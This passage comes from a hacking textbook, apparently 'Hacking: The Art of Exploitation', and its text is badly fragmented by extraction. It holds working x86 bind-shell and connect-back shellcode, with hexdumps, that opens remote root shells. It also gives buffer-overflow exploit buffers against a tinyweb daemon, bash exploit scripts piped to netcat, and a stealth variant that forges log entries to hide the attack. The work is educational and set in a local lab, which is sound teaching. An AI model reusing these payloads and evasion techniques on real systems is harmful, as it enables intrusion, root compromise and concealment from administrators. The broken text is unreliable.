push BYTE 0x1 ; (in reverse) SOCK_STREAM = 1,
push BYTE 0x2 ; AF_INET = 2 }
mov ecx, esp ; ecx = ptr to argument array
int 0x80 ; After syscall, eax has socket file descriptor
...
When a connection is
accepted, the new socket file descriptor is put into EAX at the end of this code
...
Fortunately, standard file descriptors make this fusion
remarkably simple
...
Sockets, too, are just file
descriptors that can be read from and written to
...
There is a system call specifically
for duplicating file descriptors, called dup2
...

reader@hacking:~/booksrc $ grep dup2 /usr/include/asm-i386/unistd
...
h>
int dup(int oldfd);
int dup2(int oldfd, int newfd);
DESCRIPTION
dup() and dup2() create a copy of the file descriptor oldfd
...

The bind_port
...

The following instructions are added in the file bind_shell_beta
...
The spawned shell's standard
input and output file descriptors will be the TCP connection, allowing remote shell
access
...
s
; dup2(connected socket, {all three standard I/O file descriptors})
mov ebx, eax ; Move socket FD in ebx
...

push 0x68732f2f ; push "//sh" to the stack
...

mov ebx, esp ; Put the address of "/bin//sh" into ebx via esp
...

mov edx, esp ; This is an empty array for envp
...

mov ecx, esp ; This is the argv array with string ptr
...
In the output below, grep is used to quickly
check for null bytes
...

reader@hacking:~/booksrc $ nasm bind_shell_beta
...
1
...
j
...
jfXCRfhzifS
...
QV
...
|
00000030 80 b0 66 43 52 52 56 89 e1 cd 80 89 c3 6a 3f 58 |
...
j?X|
00000040 31 c9 cd 80 b0 3f 41 cd 80 b0 3f 41 cd 80 b0 0b |1
...
?A
...
R
...
|
00000065
reader@hacking:~/booksrc $ export SHELLCODE=$(cat bind_shell_beta)
reader@hacking:~/booksrc $
...
/notesearch
SHELLCODE will be at 0xbffff97f
reader@hacking:~/booksrc $
...
Then, netcat is used to connect to the root shell on that port
...
0
...
1 31337
localhost [127
...
0
...
With control structures, the repeated calls to dup2 could be shrunk
down to a single call in a loop
...
Disassembling the main function will
show us how the compiler implemented the for loop using assembly instructions
...
This variable is referenced
in relation to the EBP register as [ebp-4]
...
c
reader@hacking:~/booksrc $ gdb -q
...
out
Using host libthread_db library "/lib/tls/i686/cmov/libthread_db
...
1"
...

(gdb)

The loop contains two new instructions: cmp (compare) and jle (jump if less than
or equal to), the latter belonging to the family of conditional jump instructions
...
Then, a conditional jump instruction will jump based on the flags
...
Otherwise, the next jmp instruction
brings execution to the end of the function at 0x080483a6, exiting the loop
...

Using conditional jump instructions, complex programming control structures
such as loops can be created in assembly
...

Instruction            Description

cmp <dest>, <source>   Compare the destination operand with the source, setting flags for use with a conditional jump instruction
...
jne                    Jump if not equal
...
jle                    Jump if less than or equal to
...
jnle                   Jump if not less than or equal to
...
jng jnge               Jump if not greater than, or not greater than or equal to
...

xor eax, eax ; Zero eax
...

jle dup_loop ; If ecx <= 2, jump to dup_loop
...
With a more
complete understanding of the flags used by the cmp instruction, this loop can be
shrunk even further
...
These
flags are carry flag (CF), parity flag (PF), adjust flag (AF), overflow flag (OF), zero
flag (ZF), and sign flag (SF)
...
The zero flag is set to true if the result is zero, otherwise it is false
...
This means that, after any instruction with
a negative result, the sign flag becomes true and the zero flag becomes false
...

SF    sign flag    True if the result is negative (equal to the most significant bit of result)
...
The jle (jump if less than
or equal to) instruction is actually checking the zero and sign flags
...
The other conditional jump instructions work in a
similar way, and there are still more conditional jump instructions that directly
check individual status flags:
Instruction   Description
jz            Jump to target if the zero flag is set
...
js            Jump if the sign flag is set
...

With this knowledge, the cmp (compare) instruction can be removed entirely if the
loop's order is reversed
...
The shortened loop is shown below, with the changes
shown in bold
...

xor eax, eax ; Zero eax
...

pop ecx

dup_loop:
mov BYTE al, 0x3F ; dup2 syscall #63
int 0x80 ; dup2(c, 0)
dec ecx ; Count down to 0
...

The first two instructions before the loop can be shortened with the
xchg (exchange) instruction
...

This single instruction can replace both of the following instructions, which take
up four bytes:

89 C3 mov ebx,eax
31 C0 xor eax,eax

The EAX register needs to be zeroed to clear only the upper three bytes of the
register, and EBX already has these upper bytes cleared
...
Naturally, this only
works in situations where the source operand's register doesn't matter
...

bind_shell
...

pop eax
cdq ; Zero out edx for use as a null DWORD later
...

inc ebx ; 1 = SYS_SOCKET = socket()
push edx ; Build arg array: { protocol = 0,
push BYTE 0x1 ; (in reverse) SOCK_STREAM = 1,
push BYTE 0x2 ; AF_INET = 2 }
mov ecx, esp ; ecx = ptr to argument array

int 0x80 ; After syscall, eax has socket file descriptor
...

; bind(s, [2, 31337, 0], 16)
push BYTE 0x66 ; socketcall (syscall #102)
pop eax
inc ebx ; ebx = 2 = SYS_BIND = bind()
push edx ; Build sockaddr struct: INADDR_ANY = 0
push WORD 0x697a ; (in reverse order) PORT = 31337
push WORD bx ; AF_INET = 2
mov ecx, esp ; ecx = server struct pointer
push BYTE 16 ; argv: { sizeof(server struct) = 16,
push ecx ; server struct pointer,
push esi ; socket file descriptor }
mov ecx, esp ; ecx = argument array
int 0x80 ; eax = 0 on success
; listen(s, 4)
mov BYTE al, 0x66 ; socketcall (syscall #102)
inc ebx
inc ebx ; ebx = 4 = SYS_LISTEN = listen()
push ebx ; argv: { backlog = 4,
push esi ; socket fd }
mov ecx, esp ; ecx = argument array
int 0x80
; c = accept(s, 0, 0)
mov BYTE al, 0x66 ; socketcall (syscall #102)
inc ebx ; ebx = 5 = SYS_ACCEPT = accept()
push edx ; argv: { socklen = 0,
push edx ; sockaddr ptr = NULL,
push esi ; socket fd }
mov ecx, esp ; ecx = argument array
int 0x80 ; eax = connected socket FD
; dup2(connected socket, {all three standard I/O file descriptors})
xchg eax, ebx ; Put socket FD in ebx and 0x00000005 in eax
...

pop ecx
dup_loop:
mov BYTE al, 0x3F ; dup2 syscall #63
int 0x80 ; dup2(c, 0)
dec ecx ; count down to 0
jns dup_loop ; If the sign flag is not set, ecx is not negative
...

push 0x68732f2f ; push "//sh" to the stack
...

mov ebx, esp ; Put the address of "/bin//sh" into ebx via esp
...

mov edx, esp ; This is an empty array for envp
...

mov ecx, esp ; This is the argv array with string ptr
int 0x80 ; execve("/bin//sh", ["/bin//sh", NULL], [NULL])

This assembles to the same 92-byte bind_shell shellcode used in the previous
chapter
...
s
reader@hacking:~/booksrc $ hexdump -C bind_shell
00000000 6a 66 58 99 31 db 43 52 6a 01 6a 02 89 e1 cd 80 |jfX
...
CRj
...
|
00000010 96 6a 66 58 43 52 66 68 7a 69 66 53 89 e1 6a 10 |
...
j
...
fCCSV
...
fCRRV
...
Y
...
Iy
...
R
...
|
0000005c
reader@hacking:~/booksrc $ diff bind_shell portbinding_shellcode

Connect-Back Shellcode
Port-binding shellcode is easily foiled by firewalls
...
This limits the
user's exposure and will prevent port-binding shellcode from receiving a
connection
...

However, firewalls typically do not filter outbound connections, since that would
hinder usability
...
This means that if the shellcode
initiates the outbound connection, most firewalls will allow it
...
Opening a TCP
connection only requires a call to socket() and a call to connect()
...
The following
connect-back shellcode was made from the bind-port shellcode with a few
modifications (shown in bold)
...
s
BITS 32
; s = socket(2, 1, 0)
push BYTE 0x66 ; socketcall is syscall #102 (0x66)
...

xor ebx, ebx ; ebx is the type of socketcall
...

xchg esi, eax ; Save socket FD in esi for later
...
168
...
72
push WORD 0x697a ; (in reverse order) PORT = 31337
push WORD bx ; AF_INET = 2
mov ecx, esp ; ecx = server struct pointer
push BYTE 16 ; argv: { sizeof(server struct) = 16,
push ecx ; server struct pointer,

push esi ; socket file descriptor }
mov ecx, esp ; ecx = argument array
inc ebx ; ebx = 3 = SYS_CONNECT = connect()
int 0x80 ; eax = connected socket FD
; dup2(connected socket, {all three standard I/O file descriptors})
xchg eax, ebx ; Put socket FD in ebx and 0x00000003 in eax
...

pop ecx
dup_loop:
mov BYTE al, 0x3F ; dup2 syscall #63
int 0x80 ; dup2(c, 0)
dec ecx ; Count down to 0
...

; execve(const char *filename, char *const argv [], char *const envp[])
mov BYTE al, 11 ; execve syscall #11
...

push 0x68732f2f ; push "//sh" to the stack
...

mov ebx, esp ; Put the address of "/bin//sh" into ebx via esp
...

mov edx, esp ; This is an empty array for envp
...

mov ecx, esp ; This is the argv array with string ptr
...
168
...
72, which
should be the IP address of the attacking machine
...
This is made clear when each number is displayed in
hexadecimal:
reader@hacking:~/booksrc $ gdb -q
(gdb) p /x 192
$1 = 0xc0
(gdb) p /x 168
$2 = 0xa8
(gdb) p /x 42
$3 = 0x2a
(gdb) p /x 72
$4 = 0x48
(gdb) p /x 31337
$5 = 0x7a69
(gdb)

Since these values are stored in network byte order but the x86 architecture is in
little-endian order, the stored DWORD seems to be reversed
...
168
...
72 is 0x482aa8c0
...
When the port number 31337 is printed in
hexadecimal using gdb, the byte order is shown in little-endian order
...

The netcat program can also be used to listen for incoming connections with the -l command-line option
...
The ifconfig command ensures the IP address of
eth0 is 192
...
42
...

reader@hacking:~/booksrc $ sudo ifconfig eth0 192
...
42
...
168
...
72 Bcast:192
...
42
...
255
...
0
UP BROADCAST MULTICAST MTU:1500 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:0 (0
...
0 b)
Interrupt:16
reader@hacking:~/booksrc $ nc -v -l -p 31337
listening on [any] 31337
...
From working with this program before, we know that the request
buffer is 500 bytes long and is located at 0xbffff5c0 in stack memory
...

reader@hacking:~/booksrc $ nasm connectback_shell
...
1
...
j
...
jfXCh
...
j
...
C
...
Iy
...
R
...
|
0000004e
reader@hacking:~/booksrc $ wc -c connectback_shell
78 connectback_shell
reader@hacking:~/booksrc $ echo $(( 544 - (4*16) - 78 ))
402
reader@hacking:~/booksrc $ gdb -q --batch -ex "p /x 0xbffff5c0 + 200"
$1 = 0xbffff688
reader@hacking:~/booksrc $

Since the offset from the beginning of the buffer to the return address is 540
bytes, a total of 544 bytes must be written to overwrite the four-byte return
address
...
To ensure proper alignment, the sum of
the NOP sled and shellcode bytes must be divisible by four
...
These are the
bounds of the request buffer, and the memory afterward corresponds to other
values on the stack that might be written to before we change the program's
control flow
...
Repeating the return address 16
times will generate 64 bytes, which can be put at the end of the 544-byte exploit
buffer and keeps the shellcode safely within the bounds of the buffer
...
The
calculations above show that a 402-byte NOP sled will properly align the 78-byte
shellcode and place it safely within the bounds of the buffer
...
Overwriting the
return address with 0xbffff688 should return execution right to the middle of
the NOP sled, while avoiding bytes near the beginning of the buffer, which might
get mangled
...
In the output below,
netcat is used to listen for incoming connections on port 31337
...

Now, in another terminal, the calculated exploit values can be used to exploit the
tinyweb program remotely
...
"\r\n"') | nc -v 127
...
0
...
0
...
1] 80 (www) open

Back in the original terminal, the shellcode has connected back to the netcat
process listening on port 31337
...

reader@hacking:~/booksrc $ nc -v -l -p 31337
listening on [any] 31337
...
168
...
72] from hacking
...
168
...
72] 34391
whoami
root

The network configuration for this example is slightly confusing because the
attack is directed at 127
...
0
...
168
...
72
...
168
...
72 is easier to
use in shellcode than 127
...
0
...
Since the loopback address contains two null
bytes, the address must be built on the stack with multiple instructions
...
The
file loopback_shell
...
s that uses the
loopback address of 127
...
0
...
The differences are shown in the following output
...
s loopback_shell
...
168
...
72
--> push DWORD 0x01BBBB7f ; Build sockaddr struct: IP Address = 127
...
0
...
By writing a two-byte WORD of null bytes at ESP+1,
the middle two bytes will be overwritten to form the correct IP address
...
These
calculations are shown in the output below, and they result in a 397-byte NOP
sled
...

reader@hacking:~/booksrc $ nasm loopback_shell
...
1
...
j
...
jfXCh
...
T$
...
j
...
C
...
I
...
Rh|
00000040 2f 2f 73 68 68 2f 62 69 6e 89 e3 52 89 e2 53 89 |//shh/bin
...
S
...
|
00000053
reader@hacking:~/booksrc $ wc -c loopback_shell
83 loopback_shell
reader@hacking:~/booksrc $ echo $(( 544 - (4*16) - 83 ))
397
reader@hacking:~/booksrc $ (perl -e 'print "\x90"x397';cat loopback_shell;perl -e 'print "\x88\xf6\xff\xbf"x16
...
0
...
1 80
localhost [127
...
0
...

reader@hacking:~ $ nc -vlp 31337
listening on [any] 31337
...
0
...
1] from localhost [127
...
0
...
COUNTERMEASURES
The golden poison dart frog secretes an extremely toxic poison—one frog can emit
enough to kill 10 adult humans
...
In response, the frogs kept evolving stronger and
stronger poisons as a defense
...
This type of co-evolution also happens with
hackers
...
In response, hackers find ways to
bypass and subvert these defenses, and then new defense techniques are created
...
Even though viruses and
worms can cause quite a bit of trouble and costly interruptions for businesses,
they force a response, which fixes the problem
...
Often these flaws are undiscovered for
years, but relatively benign worms such as CodeRed or Sasser force these
problems to be fixed
...
If it weren't for
Internet worms making a public spectacle of these security flaws, they might
remain unpatched, leaving us vulnerable to an attack from someone with more
malicious goals than just replication
...
However, there are more proactive ways to
strengthen security
...
A countermeasure is a
fairly abstract concept; this could be a security product, a set of policies, a
program, or simply just an attentive system administrator
...

Countermeasures That Detect
The first group of countermeasures tries to detect the intrusion and respond in
some way
...
The response might include killing the
connection or process automatically, or just the administrator scrutinizing
everything from the machine's console
...
The sooner an intrusion is detected, the sooner
it can be dealt with and the more likely it can be contained
...

The way to detect an intrusion is to anticipate what the attacking hacker is going
to do
...
Countermeasures that
detect can look for these attack patterns in log files, network packets, or even
program memory
...
Detecting
countermeasures are quite powerful in an electronic world with backup and
restore capabilities
...
Since
the detection might not always be immediate, there are a few "smash and grab"
scenarios where it doesn't matter; however, even then it's better not to leave
tracks
...
Exploiting a vulnerable
program to get a root shell means you can do whatever you want on that system,
but avoiding detection additionally means no one knows you're there
...
From a
concealed position, passwords and data can be quietly sniffed from the network,
programs can be backdoored, and further attacks can be launched on other hosts
...
If you know what they are looking for, you can avoid certain exploit patterns
or mimic valid ones
...

System Daemons
To have a realistic discussion of exploit countermeasures and bypass methods, we
first need a realistic exploitation target
...
In Unix, these programs are usually system
daemons
...
The term daemon was first coined by MIT
hackers in the 1960s
...
In the thought experiment,
Maxwell's demon is a being with the supernatural ability to effortlessly perform
difficult tasks, apparently violating the second law of thermodynamics
...
Daemon programs typically end with a d to signify they
are daemons, such as sshd or syslogd
...
c code on A Tinyweb Server can be made into a
more realistic system daemon
...
This function is used by many system
daemon processes in Linux, and its man page is shown below
...
h>
int daemon(int nochdir, int noclose);
DESCRIPTION
The daemon() function is for programs wishing to detach themselves from
the controlling terminal and run in the background as system daemons
...

Unless the argument noclose is non-zero, daemon() will redirect standard
input, standard output and standard error to /dev/null
...
) On success zero will be returned
...

System daemons run detached from a controlling terminal, so the new tinyweb
daemon code writes to a log file
...
The new tinyweb daemon program will need
to catch the terminate signal so it can exit cleanly when killed
...
When a process
receives a signal, its flow of execution is interrupted by the operating system to
call a signal handler
...
For example, when CTRL-C is typed in a program's
controlling terminal, an interrupt signal is sent, which has a default signal handler
that exits the program
...

Custom signal handlers can be registered using the signal() function
...

signal_example
...
h>
#include ...
h>
/* Some labeled signal defines from signal
...
\n");
exit(0);
}
int main() {
/* Registering signal handlers */
signal(SIGQUIT, signal_handler); // Set signal_handler() as the
signal(SIGTSTP, signal_handler); // signal handler for these
signal(SIGUSR1, signal_handler); // signals
...

while(1) {} // Loop forever
...
Even though the program is stuck looping,
incoming signals will interrupt execution and call the registered signal handlers
...
The signal_handler() function, when finished, returns execution back
into the interrupted loop, whereas the sigint_handler() function exits the
program
...
c
reader@hacking:~/booksrc $
...

reader@hacking:~/booksrc $

Specific signals can be sent to a process using the kill command
...
With the -l
command-line switch, kill lists all the possible signals
...

reader@hacking:~/booksrc $ kill -l
1) SIGHUP 2) SIGINT 3) SIGQUIT 4) SIGILL
5) SIGTRAP 6) SIGABRT 7) SIGBUS 8) SIGFPE
9) SIGKILL 10) SIGUSR1 11) SIGSEGV 12) SIGUSR2
13) SIGPIPE 14) SIGALRM 15) SIGTERM 16) SIGSTKFLT
17) SIGCHLD 18) SIGCONT 19) SIGSTOP 20) SIGTSTP
21) SIGTTIN 22) SIGTTOU 23) SIGURG 24) SIGXCPU
25) SIGXFSZ 26) SIGVTALRM 27) SIGPROF 28) SIGWINCH
29) SIGIO 30) SIGPWR 31) SIGSYS 34) SIGRTMIN
35) SIGRTMIN+1 36) SIGRTMIN+2 37) SIGRTMIN+3 38) SIGRTMIN+4
39) SIGRTMIN+5 40) SIGRTMIN+6 41) SIGRTMIN+7 42) SIGRTMIN+8
43) SIGRTMIN+9 44) SIGRTMIN+10 45) SIGRTMIN+11 46) SIGRTMIN+12
47) SIGRTMIN+13 48) SIGRTMIN+14 49) SIGRTMIN+15 50) SIGRTMAX-14
51) SIGRTMAX-13 52) SIGRTMAX-12 53) SIGRTMAX-11 54) SIGRTMAX-10
55) SIGRTMAX-9 56) SIGRTMAX-8 57) SIGRTMAX-7 58) SIGRTMAX-6
59) SIGRTMAX-5 60) SIGRTMAX-4 61) SIGRTMAX-3 62) SIGRTMAX-2
63) SIGRTMAX-1 64) SIGRTMAX
reader@hacking:~/booksrc $ ps a | grep signal_example
24491 pts/3 R+ 0:17
...
This signal's handler cannot be
changed, so kill -9 can always be used to kill processes
...

reader@hacking:~/booksrc $
...
Fortunately, in the new tinyweb
daemon, signals are only used for clean termination, so the implementation is
simple
...
It writes its output to a log file with
timestamps, and it listens for the terminate (SIGTERM) signal so it can shut down
cleanly when it's killed
...
The new portions of the code are shown in bold in the listing below
...
c
#include ...
h>
#include ...
h>
#include ...
h>
#include ...
h>
#include ...
h"
#include "hacking-network
...
/webroot" // The webserver's root directory
#define LOGFILE "/var/log/tinywebd
...

void handle_shutdown(int signal) {
timestamp(logfd);
write(logfd, "Shutting down
...
\n");
if(daemon(1, 0) == -1) // Fork to a background daemon process
...

signal(SIGINT, handle_shutdown); // Call handle_shutdown when interrupted
...
\n", 15);

host_addr
...
sin_port = htons(PORT); // Short, network byte order
host_addr
...
s_addr = INADDR_ANY; // Automatically fill with my IP
...
sin_zero), '\0', 8); // Zero the rest of the struct
...

sin_size = sizeof(struct sockaddr_in);
new_sockfd = accept(sockfd, (struct sockaddr *)&client_addr, &sin_size);
if(new_sockfd == -1)
fatal("accepting connection");
handle_connection(new_sockfd, &client_addr, logfd);
}
return 0;
}
/* This function handles the connection on the passed socket from the
*
...
The connection is
*
...
socket
...

*/
void handle_connection(int sockfd, struct sockaddr_in *client_addr_ptr, int logfd) {
unsigned char *ptr, request[500], resource[500], log_buffer[500];

int fd, length;
length = recv_line(sockfd, request);
sprintf(log_buffer, "From %s:%d \"%s\"\t", inet_ntoa(client_addr_ptr->sin_addr),
ntohs(client_addr_ptr->sin_port), request);

ptr = strstr(request, " HTTP/"); // Search for valid-looking request
...

ptr = NULL; // Set ptr to NULL (used to flag for an invalid request)
...

if(strncmp(request, "HEAD ", 5) == 0) // Head request
ptr = request+5; // ptr is the URL
...
html"); // add 'index
...

strcpy(resource, WEBROOT); // Begin resource with web root path
strcat(resource, ptr); // and join it with resource path
...

if(fd == -1) { // If file is not found
strcat(log_buffer, " 404 Not Found\n");
send_string(sockfd, "HTTP/1
...

strcat(log_buffer, " 200 OK\n");
send_string(sockfd, "HTTP/1
...

send(sockfd, ptr, length, 0); // Send it to socket
...

}
close(fd); // Close the file
...

} // End if block for valid request
...

timestamp(logfd);
length = strlen(log_buffer);
write(logfd, log_buffer, length); // Write to the log
...

}
/* This function accepts an open file descriptor and returns
* the size of the associated file
...

*/
int get_file_size(int fd) {
struct stat stat_struct;

if(fstat(fd, &stat_struct) == -1)
return -1;
return (int) stat_struct
...
passed to it
...

time_struct = localtime((const time_t *)&now); // Convert to tm struct
...

}

This daemon program forks into the background, writes to a log file with
timestamps, and cleanly exits when it is killed
...
This function is set up as the callback handler
for the terminate and interrupt signals, which allows the program to exit
gracefully when it's killed with the kill command
...
Notice that
the log file contains timestamps as well as the shutdown message when the
program catches the terminate signal and calls handle_shutdown() to exit
gracefully
...
c
reader@hacking:~/booksrc $ sudo chown root
...
/tinywebd
reader@hacking:~/booksrc $
...

reader@hacking:~/booksrc $
...
0
...
1
The web server for 127
...
0
...
/tinywebd
25075 pts/3 R+ 0:00 grep tinywebd
reader@hacking:~/booksrc $ kill 25058
reader@hacking:~/booksrc $ ps ax | grep tinywebd
25121 pts/3 R+ 0:00 grep tinywebd
reader@hacking:~/booksrc $ cat /var/log/tinywebd
...
log: Permission denied
reader@hacking:~/booksrc $ sudo cat /var/log/tinywebd
...

07/22/2007 17:57:00> From 127
...
0
...
0" 200 OK
07/22/2007 17:57:21> Shutting down
...
Both programs are vulnerable to the same
overflow exploit; however, the exploitation is only the beginning
...

Tools of the Trade
With a realistic target in place, let's jump back over to the attacker's side of the
fence
...
Like
a set of lock picks in the hands of a professional, exploits open many doors for a
hacker
...

In previous chapters, we've written exploit code in C and manually exploited
vulnerabilities from the command line
...
Exploit
programs are more like guns than tools
...
Both guns
and exploit programs are finalized products that can be used by unskilled people
with dangerous results
...
With an understanding of programming, it's
only natural that a hacker would begin to write his own scripts and tools to aid
exploitation
...
Like conventional tools, they can be used for many purposes,
extending the skill of the user
...
As in the development of our previous exploits, GDB is
used first to figure out the details of the vulnerability, such as offsets
...
c program, but a
daemon program presents added challenges
...
In the output below, a breakpoint is set after the daemon() call, but the
debugger never hits it
...
c
reader@hacking:~/booksrc $ sudo gdb -q
...
out
warning: not using untrusted file "/home/reader/
...
so
...

(gdb) list 47
42
43 if (setsockopt(sockfd, SOL_SOCKET, SO_REUSEADDR, &yes, sizeof(int)) == -1)
44 fatal("setting socket option SO_REUSEADDR");
45
46 printf("Starting tiny web daemon
...

48 fatal("forking to daemon process");
49
50 signal(SIGTERM, handle_shutdown); // Call handle_shutdown when killed
...

(gdb) break 50

Breakpoint 1 at 0x8048e84: file tinywebd
...

(gdb) run
Starting program: /home/reader/booksrc/a
...

Program exited normally
...
In order to debug this program, GDB needs
to be told to follow the child process, as opposed to following the parent
...
After this change, the debugger will
follow execution into the child process, where the breakpoint can be hit
...

A fork or vfork creates a new process
...

By default, the debugger will follow the parent process
...
out
Starting tiny web daemon
...
c:50
50 signal(SIGTERM, handle_shutdown); // Call handle_shutdown when killed
...
Exit anyway? (y or n) y
reader@hacking:~/booksrc $ ps aux | grep a
...
0 0
...
out
reader 1207 0
...
0 2880 748 pts/2 R+ 06:13 0:00 grep a
...
After killing
any stray a
...

reader@hacking:~/booksrc $
...

reader@hacking:~/booksrc $ ps aux | grep tinywebd
root 25830 0
...
0 1636 356 ? Ss 20:10 0:00
...
0 0
...
c
reader@hacking:~/booksrc $ sudo gdb -q --pid=25830 --symbols=
...
out
warning: not using untrusted file "/home/reader/
...
so
...

Attaching to process 25830
/cow/home/reader/booksrc/tinywebd: No such file or directory
...
Kill it? (y or n) n
Program not killed
...
c:68

(gdb) list 68
63 if (listen(sockfd, 20) == -1)
64 fatal("listening on socket");
65
66 while(1) { // Accept loop
67 sin_size = sizeof(struct sockaddr_in);
68 new_sockfd = accept(sockfd, (struct sockaddr *)&client_addr, &sin_size);
69 if(new_sockfd == -1)
70 fatal("accepting connection");
71
72 handle_connection(new_sockfd, &client_addr, logfd);
(gdb) list handle_connection
77 /* This function handles the connection on the passed socket from the
78 * passed client address and logs to the passed FD
...
Finally, the passed socket is closed at the end of the function
...
c, line 86
...

The execution pauses while the tinyweb daemon waits for a connection
...

Breakpoint 1, handle_connection (sockfd=5, client_addr_ptr=0xbffff810) at tinywebd
...
c:86
#1 0x08048fb7 in main () at tinywebd
...
Quit anyway (and detach it)? (y or n) y
Detaching from program: , process 25830
reader@hacking:~/booksrc $

The debugger shows that the request buffer starts at 0xbffff5c0 and the stored
return address is at 0xbffff7dc, which means the offset is 540 bytes
...
In the
output below, an exploit buffer is created that sandwiches the shellcode between
a NOP sled and the return address repeated 32 times
...
There are also unsafe bytes near the beginning of the exploit buffer,
which will be overwritten during null termination
...
This leaves a safe landing zone
for the execution pointer, with the shellcode at 0xbffff624
...

reader@hacking:~/booksrc $
...

reader@hacking:~/booksrc $ wc -c loopback_shell
83 loopback_shell
reader@hacking:~/booksrc $ echo $((540+4 - (32*4) - 83))
333
reader@hacking:~/booksrc $ nc -l -p 31337 &
[1] 9835
reader@hacking:~/booksrc $ jobs
[1]+ Running nc -l -p 31337 &
reader@hacking:~/booksrc $ (perl -e 'print "\x90"x333'; cat loopback_shell; perl -e 'print "\x24\xf6\xff\xbf"x32
...
0
...
1 80
localhost [127
...
0
...
With the loopback shellcode at 83 bytes and the
overwritten return address repeated 32 times, simple arithmetic shows that the
NOP sled needs to be 333 bytes to align everything in the exploit buffer properly
...
This listens for the connection back from
the shellcode and can be resumed later with the command fg (foreground)
...
When the
exploit buffer is piped into netcat, the -w option is used to tell it to time out after
one second
...

All this works fine, but if a shellcode of different size is used, the NOP sled size
must be recalculated
...

The BASH shell allows for simple control structures
...
Shell variables are used for the offset and overwrite return address, so
they can be easily changed for a different target
...

xtool_tinywebd
...
\"\r\n\"";) | nc -w 1 -v $2 80

Notice that this script repeats the return address an additional thirty-third time,
but it uses 128 bytes (32 x 4) for calculating the sled size
...
Sometimes different compiler
options will move the return address around a little bit, so this makes the exploit
more reliable
...

reader@hacking:~/booksrc $
...

reader@hacking:~/booksrc $
...
sh portbinding_shellcode 127
...
0
...
0
...
1
shellcode: portbinding_shellcode (92 bytes)
[NOP (324 bytes)] [shellcode (92 bytes)] [ret addr (128 bytes)]
localhost [127
...
0
...
0
...
1 31337
localhost [127
...
0
...
If you were the administrator of the server running the
tinyweb daemon, what would be the first signs that you were hacked?

Log Files
One of the two most obvious signs of intrusion is the log file
...
Even though the attacker's exploits were successful, the log file keeps a
painfully obvious record that something is up
...
log
07/25/2007 14:55:45> Starting up
...
0
...
1:38127 "HEAD / HTTP/1
...
0
...
1:50201 "GET / HTTP/1
...
0
...
1:50202 "GET /image
...
1" 200 OK
07/25/2007 17:49:14> From 127
...
0
...
ico HTTP/1
...

08/01/2007 15:43:08> Starting up
...
0
...
1:45396 "␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣
␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣
␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣
␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣jfX␣1␣CRj j ␣␣ ␣jfXCh ␣␣
f␣T$ fhzifS␣␣j OV␣␣C ␣␣␣␣I␣? Iy␣␣
Rh//shh/bin␣␣R␣␣S␣␣ $␣␣␣$␣␣␣$␣␣␣$␣␣␣$␣
␣␣$␣␣␣$␣␣␣$␣␣␣$␣␣␣$␣␣␣$␣␣␣$␣␣␣$␣␣␣$␣␣␣$␣␣␣$␣␣␣$␣␣␣$␣␣␣$␣␣␣$␣␣␣$␣␣␣$␣␣␣$␣
␣␣$␣␣␣$␣␣␣$␣␣␣$␣␣␣$␣␣␣$␣␣␣$␣␣␣$␣␣␣" NOT HTTP!
reader@hacking:~/booksrc $

Of course in this case, after the attacker gains a root shell, he can just edit the log
file since it's on the same system
...
In extreme cases, logs are sent to a printer
for hard copy, so there is a physical record
...

Blend In with the Crowd
Even though the log files themselves cannot be changed, occasionally what gets
logged can be
...
The tinyweb daemon program can be tricked
into logging a valid-looking entry for an exploit attempt
...
The idea is to
make the log entry look like a valid web request, like the following:
07/22/2007 17:57:00> From 127
...
0
...
0" 200 OK
07/25/2007 14:49:14> From 127
...
0
...
1" 200 OK
07/25/2007 14:49:14> From 127
...
0
...
jpg HTTP/1
...
0
...
1:50203 "GET /favicon
...
1" 404 Not Found

This type of camouflage is very effective at large enterprises with extensive log
files, since there are so many valid requests to hide among: It's easier to blend in
at a crowded mall than an empty street
...
The recv_line() function uses \r\n as the delimiter;
however, all the other standard string functions use a null byte for the delimiter
...

The following exploit script puts a valid-looking request in front of the rest of the
exploit buffer
...

xtool_tinywebd_stealth
...
1\x00"
FR_SIZE=$(perl -e "print \"$FAKEREQUEST\"" | wc -c | cut -f1 -d ' ')
OFFSET=540
RETADDR="\x24\xf6\xff\xbf" # At +100 bytes from buffer @ 0xbffff5c0
echo "target IP: $2"
SIZE=`wc -c $1 | cut -f1 -d ' '`
echo "shellcode: $1 ($SIZE bytes)"
echo "fake request: \"$FAKEREQUEST\" ($FR_SIZE bytes)"
ALIGNED_SLED_SIZE=$(($OFFSET+4 - (32*4) - $SIZE - $FR_SIZE))
echo "[Fake Request ($FR_SIZE b)] [NOP ($ALIGNED_SLED_SIZE b)] [shellcode ($SIZE b)] [ret addr ($((4*32)) b)]"
(perl -e "print \"$FAKEREQUEST\"
...
\"\r\n\"") | nc -w 1 -v $2 80

This new exploit buffer uses the null byte delimiter to terminate the fake request
camouflage
...
Since the string functions used to write to the
log use a null byte for termination, the fake request is logged and the rest of the
exploit is hidden
...

reader@hacking:~/booksrc $
...

reader@hacking:~/booksrc $ nc -l -p 31337 &
[1] 7714
reader@hacking:~/booksrc $ jobs
[1]+ Running nc -l -p 31337 &
reader@hacking:~/booksrc $
...
sh loopback_shell 127
...
0
...
0
...
1
shellcode: loopback_shell (83 bytes)
fake request: "GET / HTTP/1
...
0
...
1] 80 (www) open
reader@hacking:~/booksrc $ fg
nc -l -p 31337
whoami
root

The connection used by this exploit creates the following log file entries on the
server machine
...

08/02/2007 13:37:44> From 127
...
0
...
1" 200 OK

Even though the logged IP address cannot be changed using this method, the
request itself appears valid, so it won't attract too much attention
...
However, when testing, this is something that is easily overlooked
...
When the tinyweb daemon is exploited, the
process is tricked into providing a remote root shell, but it no longer processes
